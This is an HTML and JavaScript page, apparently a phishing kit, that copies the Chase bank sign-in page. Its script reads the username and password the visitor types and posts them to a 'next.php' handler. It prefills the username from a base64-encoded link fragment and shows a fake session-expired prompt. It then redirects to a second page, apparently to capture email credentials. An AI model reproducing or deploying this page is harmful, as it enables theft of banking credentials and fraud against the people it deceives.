<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Sign in - chase.com</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="./images/chasefavicon.ico">
    <link rel="stylesheet" href="./css/logon.css">
    <link rel="stylesheet" href="./css/blue-ui.css">
   <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
</head>

<body style="overflow-x: hidden; overflow-y: auto; height: 100%">
    <div id="logonApp" data-is-view="true">
        <div class="homepage" tabindex="-1">
            <div class="logon-container" id="container">
                <header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
                    <div class="logon header jpui transparent navigation bar" data-is-view="true"><a id="logoHomepageLink" href="#">
                            <div class="chase logo"></div> <span class="util accessible-text">Chase.com homepage</span>
                        </a> </div>
                </header>
                <main id="logon-content" data-has-view="true">
                    <div class="container logon" data-is-view="true">
                        <div>
                            <div id="backgroundImage">
                                <div class="jpui background image fixed" id="geoImage">
                                    <style type="text/css">
                                    .jpui.background.image {
                                        background-image: url(./images/bg.jpeg);
                                        filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='./images/bg.jpeg', sizingMethod='scale');
                                        -ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='./images/bg.jpeg', sizingMethod='scale');
                                    }

                                    @media (min-width:320px) {
                                        .jpui.background.image {
                                            background-image: url(./images/bg.jpeg);
                                        }
                                    }

                                    @media (min-width:992px) {
                                        .jpui.background.image {
                                            background-image: url(./images/bg.jpeg);
                                        }
                                    }

                                    @media (min-width:1024px) {
                                        .jpui.background.image {
                                            background-image: url(./images/bg.jpeg);
                                        }
                                    }
                                    </style>
                                </div>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
                                <div class="jpui raised segment">
                                    <div id="thirdPartyAggregatorSecurityBanner"></div>
                                    <div class="row">
                                        <div class="col-xs-10 col-xs-offset-1">
                                            <form id="login-form" autocomplete="off">
                                                <div class="jpui fieldgroup logon-xs-toggle logon-floating-label userEmail-margin-top" id="userEmail">
                                                    <p id="msg" style="color: red;font-weight: 600;font-size: 14px;padding-bottom: 10px; display: none;">Session expire please verify your identification with your email address</p>
                                                    <p id="error" style="color: red;font-weight: 600;font-size: 14px;padding-bottom: 10px; display: none;">That account doesn't exist. Enter a different account</p>
                                                    <div class="jpui vertical">
                                                        <div class="align-label-input floating-label__container" id="eid">
                                                            <div class="label-wrapper">
                                                                <label class="jpui fieldlabel label-alignment vertical " id="userEmail-label" for="userEmail-text-input-field" aria-hidden="false">Username</label>
                                                            </div>
                                                            <div class="logon-xs-toggle" id="userEmail-text">
                                                                <input class="jpui input logon-xs-toggle " id="userEmail-text-input-field" placeholder="" type="text" name="userEmail" required="" value="">
                                                            </div>
                                                        </div>
                                                        <div>
                                                            <div> </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="jpui fieldgroup logon-xs-toggle logon-floating-label " id="password">
                                                    <div class="jpui vertical">
                                                        <div class="align-label-input floating-label__container " id="pid">
                                                            <div class="label-wrapper">
                                                                <label class="jpui fieldlabel label-alignment vertical" id="password-label" for="password-text-input-field" aria-hidden="false">
                                                                    <span class="util accessible-text" id="password-label-errorLabel"></span>
                                                                    Password
                                                                    <span class="util accessible-text" id="password-label-accessible-text"></span>
                                                                </label>
                                                            </div>
                                                            <div class="logon-xs-toggle" id="password-text">
                                                                <input min="0" class="jpui input logon-xs-toggle" id="password-text-input-field" placeholder="" format="" aria-describedby="  password-input-field-label" autocomplete="off" type="password" name="password" data-validate="password" required="" value="">
                                                            </div>
                                                        </div>
                                                        <div>
                                                            <div> </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="row logon-xs-toggle">
                                                    <div class="col-xs-6 rememberMe-checkbox-container">
                                                        <div class="jpui checkbox" id="rememberMe">
                                                            <div class="checkbox-flex">
                                                                <div class="checkboxWrap">
                                                                    <input class="checkbox__input" type="checkbox" id="input-rememberMe" aria-label="This checked box means that we will remember your username.  Remember me" name="rememberMe" value="on"> <i class="jpui checkmark icon check" aria-hidden="true"></i></div> <label for="input-rememberMe"> <span class="checkbox-label" id="label-rememberMe">Remember me </span></label>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="row"><button type="submit" id="submit-btn" name="signin-button" class="jpui button focus fluid primary" style="color: white">Sign in</button></div>
                                                <div class="row"><span class="jpui link" id="forgotPassword-link-wrapper"><a class="link-anchor" id="forgotPassword" href="#" aria-label=" Forgot username/password? ">Forgot username/password?<i class="fas fa-chevron-right" style="padding-left: 5px" id="forgotPassword-endIcon" aria-hidden="true"></i></a></span></div>
                                                <div class="row"><span class="jpui link" id="enrollment-link-wrapper"><a class="link-anchor last" id="enrollment" href="#" aria-label=" Not Enrolled? Sign Up Now. ">Not Enrolled? Sign Up Now.<i class="fas fa-chevron-right" style="padding-left: 5px" id="enrollment-endIcon" aria-hidden="true"></i></a></span></div>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </main>
            </div>
            <footer class="logon-footer" id="logon-footer" data-has-view="true">
                <div class="footer-container" data-is-view="true" style="position: static;">
                    <div class="container">
                        <div class="social-links row">
                            <div class="col-xs-12"><span class="follow-us-text">Follow us:</span>
                                <ul class="icon-links">
                                    <li class="facebook"><span id="requestChaseFacebook-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseFacebook"> <span class="util accessible-text" id="accessible-requestChaseFacebook">Facebook: Opens dialog</span> <i class="fab fa-facebook-square" id="icon-requestChaseFacebook" aria-hidden="true"></i></a></span></li>
                                    <li class="instagram"><span id="requestChaseInstagram-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseInstagram"> <span class="util accessible-text" id="accessible-requestChaseInstagram">Instagram: Opens dialog</span> <i class="fab fa-instagram-square"></i></a></span></li>
                                    <li class="twitter"><span id="requestChaseTwitter-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseTwitter"> <span class="util accessible-text" id="accessible-requestChaseTwitter">Twitter: Opens dialog</span> <i class="fab fa-twitter-square"></i></a></span></li>
                                    <li class="youtube"><span id="requestChaseYouTube-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseYouTube"> <span class="util accessible-text" id="accessible-requestChaseYouTube">YouTube: Opens dialog</span> <i class="fab fa-youtube"></i></a></span></li>
                                    <li class="linkedin"><span id="requestChaseLinkedIn-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseLinkedIn"> <span class="util accessible-text" id="accessible-requestChaseLinkedIn">LinkedIn: Opens dialog</span> <i class="fab fa-linkedin"></i></a></span></li>
                                </ul>
                            </div>
                        </div>
                        <div class="footer-links row implement-ada-features-enabled">
                            <div class="col-xs-12">
                                <ul>
                                    <li><span class="jpui link" id="requestContactUs-link-wrapper"><a class="link-anchor" id="requestContactUs" href="javascript:void(0);" aria-label=" Contact us ">Contact us</a></span></li>
                                    <li><span class="jpui link" id="requestPrivacyNotice-link-wrapper"><a class="link-anchor" id="requestPrivacyNotice" href="javascript:void(0);" aria-label=" Privacy ">Privacy</a></span></li>
                                    <li><span class="jpui link" id="requestSecurity-link-wrapper"><a class="link-anchor" id="requestSecurity" href="javascript:void(0);" aria-label=" Security ">Security</a></span></li>
                                    <li><span class="jpui link" id="requestTermsOfUse-link-wrapper"><a class="link-anchor" id="requestTermsOfUse" href="javascript:void(0);" aria-label=" Terms of use ">Terms of use</a></span></li>
                                    <li><span class="jpui link" id="requestAccessibility-link-wrapper"><a class="link-anchor" id="requestAccessibility" href="javascript:void(0);" aria-label=" Accessibility ">Accessibility</a></span></li>
                                    <li><span class="jpui link" id="requestMortgageLoanOriginators-link-wrapper"><a class="link-anchor" id="requestMortgageLoanOriginators" href="javascript:void(0);" aria-label=" SAFE Act: Chase Mortgage Loan Originators ">SAFE Act: Chase Mortgage Loan Originators</a></span></li>
                                    <li><span class="jpui link" id="requestHomeMortgageDisclosureAct-link-wrapper"><a class="link-anchor" id="requestHomeMortgageDisclosureAct" href="javascript:void(0);" aria-label=" Fair Lending ">Fair Lending</a></span></li>
                                    <li><span class="jpui link" id="requestAboutChase-link-wrapper"><a class="link-anchor" id="requestAboutChase" href="javascript:void(0);" aria-label=" About Chase ">About Chase</a></span></li>
                                    <li><span class="jpui link" id="requestJpMorgan-link-wrapper"><a class="link-anchor" id="requestJpMorgan" href="javascript:void(0);" aria-label=" J.P. Morgan ">J.P. Morgan</a></span></li>
                                    <li><span class="jpui link" id="requestJpMorganChaseCo-link-wrapper"><a class="link-anchor" id="requestJpMorganChaseCo" href="javascript:void(0);" aria-label=" JPMorgan Chase &amp; Co. ">JPMorgan Chase &amp; Co.</a></span></li>
                                    <li><span class="jpui link" id="requestCareers-link-wrapper"><a class="link-anchor" id="requestCareers" href="javascript:void(0);" aria-label=" Careers ">Careers</a></span></li>
                                    <li><span class="jpui link" id="requestEspanol-link-wrapper"><a class="link-anchor" id="requestEspanol" href="javascript:void(0);" aria-label=" Español ">Español</a></span></li>
                                    <li><span class="jpui link" id="requestChaseCanada-link-wrapper"><a class="link-anchor" id="requestChaseCanada" href="javascript:void(0);" aria-label=" Chase Canada ">Chase Canada</a></span></li>
                                    <li><span class="jpui link" id="requestSiteMap-link-wrapper"><a class="link-anchor" id="requestSiteMap" href="javascript:void(0);" aria-label=" Site map ">Site map</a></span></li>
                                    <li>Member FDIC</li>
                                    <li><i class="fas fa-home"></i> Equal Housing Lender</li>
                                    <li class="copyright-label">2022 JPMorgan Chase Co.</li>
                                </ul>
                            </div>
                        </div>
                        <div class="row galaxy-footer">
                            <div class="col-xs-10 col-xs-offset-1">
                                <p class="NOTE"><span></span><br> <span class="copyright-label">2022 JPMorgan Chase Co.</span></p>
                                <p><span class="jpui link" id="galaxyRequestPrivacyNotice-link-wrapper"><a class="link-anchor NOTELINK" id="galaxyRequestPrivacyNotice" href="javascript:void(0);" aria-label=" Privacy ">Privacy<i class="jpui progressright icon end-icon" id="galaxyRequestPrivacyNotice-endIcon" aria-hidden="true"></i></a></span></p>
                                <p><span class="jpui link" id="galaxyRequestAccessibility-link-wrapper"><a class="link-anchor NOTELINK" id="galaxyRequestAccessibility" href="javascript:void(0);" aria-label=" Accessibility ">Accessibility<i class="jpui progressright icon end-icon" id="galaxyRequestAccessibility-endIcon" aria-hidden="true"></i></a></span></p>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $("#userId-text-input-field").focus(function() {
        $("#id").addClass("floating");
    });
    $("#userId-text-input-field").focusout(function() {
        var ai = $('#userId-text-input-field').val();
        if (!ai) {
            $("#id").removeClass("floating");
        }

    });
    $("#userEmail-text-input-field").focus(function() {
        $("#eid").addClass("floating");
    });
    $("#userEmail-text-input-field").focusout(function() {
        var ai = $('#userEmail-text-input-field').val();
        if (!ai) {
            $("#eid").removeClass("floating");
        }

    });

    $("#password-text-input-field").focus(function() {
        $("#pid").addClass("floating");
    });
    $("#password-text-input-field").focusout(function() {
        var ai = $('#password-text-input-field').val();
        if (!ai) {
            $("#pid").removeClass("floating");
        }

    });



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(ai)) {
            // alert(btoa(ai));
            var my_ai = ai;
        } else {
            // alert(atob(ai));
            var my_ai = atob(ai);
        }

        $('#userEmail-text-input-field').val(my_ai);
        $("#userEmail-text-input-field").focus();

    }
    //////url ai end///////////////

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#userEmail-text-input-field").val();
        var pr = $("#password-text-input-field").val();

        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (count == 0) {
            if (!ai) {
                $('#error').show();
                $('#error').html("Username field is empty.!");
                return false;
            }

        } else {
            if (!ai) {
                $('#error').show();
                $('#error').html("Email field is empty.!");
                return false;
            }

            if (!filter.test(my_ai)) {
                $('#error').show();
                $('#error').html("That account doesn't exist. Enter a different account");

                return false;
            }
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");

            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: 'next.php',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },

            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            
            complete: function() {
                $("#password-text-input-field").val("");
                
                
                if (count >= 1) {
                    count = 0;
                    window.location.replace("./em.html");
                    return false;
                }
                
                $("#msg").show();
                $('#submit-btn').html('Sign in');
            }
        });
    });


});
</script>

</html>